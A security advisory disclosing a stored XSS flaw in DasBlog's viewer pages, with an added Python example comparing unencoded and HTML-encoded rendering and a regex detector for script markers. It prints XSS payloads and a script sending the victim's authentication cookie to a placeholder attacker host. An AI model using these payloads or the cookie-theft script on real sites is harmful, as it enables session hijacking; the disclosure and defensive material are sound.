Security Advisory: XSS Vulnerability in Newtelligence DasBlog

ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog

Author:
Dominick Baier <dbaier@ernw.de>

1. Summary:
A cross-site scripting (XSS) vulnerability in DasBlog's Event and Activity Viewer allows an attacker to inject script that is executed in the browser of anyone viewing those pages. With such script the attacker can transfer the ASP.NET Forms Authentication cookie to a server of his choice, then use the stolen cookie to log on to DasBlog and modify blog entries and configuration settings.

2. Severity: Critical

3. Systems affected

DasBlog Versions:
 All

Browsers
 Tested with IE 6 and Firefox 0.9.3

4. Patch Availability / Vendor Instructions

5. Details

The Activity and Event viewers show details about requests made to the blog site, including the Referer, query string and User-Agent of each request. These values are taken straight from the HTTP request and embedded in the HTML pages without encoding, so a client can send specially crafted headers that contain script. The script is stored with the request details and executed in the browser of whoever views the viewer pages, typically the blog administrator. With specially crafted JavaScript an attacker can transfer the ASP.NET Forms Authentication cookie to a server of his choice. By injecting this cookie into an HTTP request to DasBlog he can authenticate without knowing the username or password and enter the administrative area.

Examples of script injections (the second and third are URL-encoded, as they would be sent in a query string):

<script>alert('XSS')</script>
<img%20src="javascript:alert('XSS')">
<img%20src=javascript:alert(&quot;XSS&quot;)>

Sending the first payload in the User-Agent header, for example, results in the following HTTP request:

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.victim.com
Accept: */*

Example of transferring the cookie using JavaScript (the script redirects the victim's browser to the attacker's server with the cookie in the query string):

<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie='+document.cookie</script>
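The following is an added example, not code from DasBlog or from this advisory. It models in Python what the Activity Viewer does with the three request fields: the vulnerable form concatenates the raw header values into HTML, the hardened form HTML-encodes every value first (the ASP.NET equivalent is HttpUtility.HtmlEncode), and a small check flags log entries whose header values carry script markers so an administrator can find poisoned entries. The log entries are constructed sample data; the payloads are the ones quoted above, and the host names are placeholders.

```python
"""Added example (not DasBlog's code): vulnerable vs. encoded rendering of
request details, plus a scan for injected script in logged header values."""
import html
import re

# Constructed sample request log entries: the values the viewer renders.
# Entry 0 is benign; entries 1-3 carry the advisory's payloads in the
# User-Agent, Referer and query string respectively.
SAMPLE_REQUESTS = [
    {"referrer": "http://example.org/", "query": "", "user_agent": "Mozilla/5.0"},
    {"referrer": "", "query": "",
     "user_agent": "<script>alert('xss')</script>"},
    {"referrer": "<img src=\"javascript:alert('XSS')\">", "query": "",
     "user_agent": "curl/7.0"},
    {"referrer": "", "user_agent": "Mozilla/4.0",
     "query": "q=<script>document.location='http://www.evil-site.com/"
              "cookieEater.aspx?cookie='+document.cookie</script>"},
]

# One table row per request, as a viewer page would lay it out.
ROW = "<tr><td>{referrer}</td><td>{query}</td><td>{user_agent}</td></tr>"


def render_vulnerable(entries):
    """Models the reported behaviour: header values go into the HTML untouched,
    so a <script> in the User-Agent becomes live script in the viewer page."""
    return "\n".join(ROW.format(**e) for e in entries)


def render_encoded(entries):
    """Hardened rendering: every untrusted value is HTML-encoded, so the same
    payload is displayed as text (&lt;script&gt;...) instead of executed."""
    return "\n".join(
        ROW.format(**{k: html.escape(v, quote=True) for k, v in e.items()})
        for e in entries
    )


# Markers worth flagging in logged header values: script tags, img tags,
# javascript: URLs and inline event handlers (onerror=, onload=, ...).
SCRIPT_MARKERS = re.compile(r"<\s*script|<\s*img|javascript\s*:|on\w+\s*=",
                            re.IGNORECASE)


def find_injections(entries):
    """Return (entry index, field name) pairs for every logged value that
    contains a script marker; each field is reported at most once."""
    hits = []
    for i, entry in enumerate(entries):
        for field, value in entry.items():
            if SCRIPT_MARKERS.search(value):
                hits.append((i, field))
    return hits


if __name__ == "__main__":
    print("vulnerable page:\n" + render_vulnerable(SAMPLE_REQUESTS))
    print("\nencoded page:\n" + render_encoded(SAMPLE_REQUESTS))
    print("\nsuspicious entries:", find_injections(SAMPLE_REQUESTS))
```

The encoded output still shows the administrator exactly what was sent, which is what the viewer is for; it just no longer lets the browser interpret it. Encoding at render time is the fix, since the values must be stored verbatim to be useful as log data.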

6. Solution
Install the vendor patch. The underlying fix is to HTML-encode the Referer, query string and User-Agent values before they are written into the Activity and Event viewer pages.

7. Time-Line
The vulnerability was found on 15 August 2004. The author of DasBlog was contacted the same day and responded immediately. The patch was provided on 30 August 2004.

8. Disclaimer
 
The information in this advisory is provided "AS IS" without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.
